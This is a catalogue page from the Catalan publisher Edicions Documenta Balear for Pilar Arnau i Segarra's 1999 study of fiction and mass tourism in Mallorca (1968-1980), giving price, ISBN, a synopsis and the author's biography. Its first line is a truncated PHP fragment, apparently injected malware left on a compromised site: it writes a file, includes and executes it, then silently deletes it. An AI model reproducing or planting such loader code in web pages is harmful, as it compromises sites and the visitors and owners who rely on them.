");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Narrativa i turisme a Mallorca (1968-1980)
Cercador d'Obres
ORDENAR:
Començar recerca

Narrativa i turisme a Mallorca (1968-1980)

Arnau i Segarra, Pilar

Prologuista:
Rosselló i Bover, Pere
Col·lecció:
Menjavents
Tema:

Pàgines:
276
PVP:
13.00
ISBN:
84-89067-54-6
Data d'Edició:
11/04/1999
Sinopsi
Introducció substancial a dos fenòmens estretament vinculats: les transformacions provocades pel desenvolupament del turisme de massa a Mallorca i l’aparició, simultània, d’una generació de narradors que prendrà, en gran manera, el turisme com a tema central.
Pilar Arnau i Segarra
(Vinaròs 1964)
És diplomada en Traducció (UAB) i en Didàctica de Llengües Estrangeres (Université de Tolouse-Le Mirail), on també es va llicenciar en Filologia amb una Maîtrise que fou publicada el 1999 a Edicions Documenta Balear amb el títol Narrativa i turisme a Mallorca (1968-1980). Té un Màster de Llengua i Literatura Catalanes (UIB). Ha ampliat estudis a les universitats de Trieste, Bochum i Hamburg, i ha fet estades de recerca predoctoral a les de Canterbury, Torino i Hamburg. Ha estat lectora de català a les uni­versitats de Bochum i Bremen, i assistent científica de càtedra a la Universitat de Münster. Especialitzada en l’estudi de la literatura catalana contemporània, sobretot la d’autoria mallorquina, ha coordinat volums col·lectius, ha publicat uns cinquanta articles d’investigació literària, i és autora de la biografia de Josep M. Llompart.Recomanar
Comentar
Comentaris (0)